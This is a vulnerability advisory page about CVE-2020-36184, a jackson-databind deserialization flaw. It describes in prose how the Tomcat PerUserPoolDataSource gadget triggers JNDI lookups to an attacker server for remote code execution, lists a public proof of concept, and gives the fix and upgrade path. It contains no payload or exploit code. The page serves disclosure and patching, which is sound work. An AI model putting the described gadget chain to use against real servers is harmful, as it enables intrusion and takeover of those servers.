CVE-2020-36184
Deserialization vulnerability in jackson-databind (Maven)
What is CVE-2020-36184 About?
This is a deserialization vulnerability in FasterXML jackson-databind versions 2.x before 2.9.10.8. It arises from mishandling the interaction between serialization gadgets and typing, specifically involving `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`. This vulnerability can lead to remote code execution. Exploitation requires an attacker to control serialized data.
Affected Software
Technical Details
The FasterXML jackson-databind library, when configured for polymorphic deserialization, can be abused by an attacker who provides a specially crafted serialized payload. This payload will leverage the org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource class as a gadget. Upon deserialization, the PerUserPoolDataSource object will attempt to load a driver or establish connections based on properties within the malicious payload. This mechanism can be used to initiate JNDI lookups to an attacker-controlled server, allowing the attacker to download and execute arbitrary code on the target system.
What is the Impact of CVE-2020-36184?
Successful exploitation may allow attackers to execute arbitrary code on the server, potentially leading to a full compromise of the underlying system, data exfiltration, or denial of service.
What is the Exploitability of CVE-2020-36184?
Exploitation of this jackson-databind deserialization vulnerability requires the attacker to submit a carefully constructed payload (e.g., JSON or XML) to an application endpoint that deserializes objects using the vulnerable library. The complexity is moderate, requiring specific knowledge of the PerUserPoolDataSource gadget and how deserialization works in a Java environment. No strict authentication is needed if the vulnerable endpoint is exposed. This is a remote exploitation scenario. The key prerequisites include the vulnerable jackson-databind version, the presence of the PerUserPoolDataSource class on the application's classpath, and the application processing untrusted serialized input without proper validation or whitelisting of classes.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| Al1ex | Link | CVE-2020-36184 && Jackson-databind RCE |
What are the Available Fixes for CVE-2020-36184?
About the Fix from Resolved Security
The patch extends the set of blocked classes in Jackson's SubTypeValidator to include org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource and SharedPoolDataSource, preventing their deserialization. This stops attackers from exploiting CVE-2020-36184 by blocking deserialization gadget chains that could allow remote code execution via malicious data containing these vulnerable class names.
Available Upgrade Options
- com.fasterxml.jackson.core:jackson-databind
- >2.0.0, <2.9.10.8 → Upgrade to 2.9.10.8
Struggling with dependency upgrades?
See how Resolved Security's drop-in replacements make it simple.
Book a demoAdditional Resources
- https://www.oracle.com//security-alerts/cpujul2021.html
- https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html
- https://www.oracle.com/security-alerts/cpuapr2022.html
- https://github.com/FasterXML/jackson-databind/commit/567194c53ae91f0a14dc27239afb739b1c10448a
- https://www.oracle.com/security-alerts/cpuoct2021.html
- https://www.oracle.com//security-alerts/cpujul2021.html
- https://security.netapp.com/advisory/ntap-20210205-0005
- https://www.oracle.com/security-alerts/cpuApr2021.html
- https://github.com/FasterXML/jackson-databind/issues/2998
- https://www.oracle.com/security-alerts/cpuapr2022.html
What are Similar Vulnerabilities to CVE-2020-36184?
Similar Vulnerabilities: CVE-2020-24750 , CVE-2020-36182 , CVE-2020-24616 , CVE-2019-12814 , CVE-2019-14540
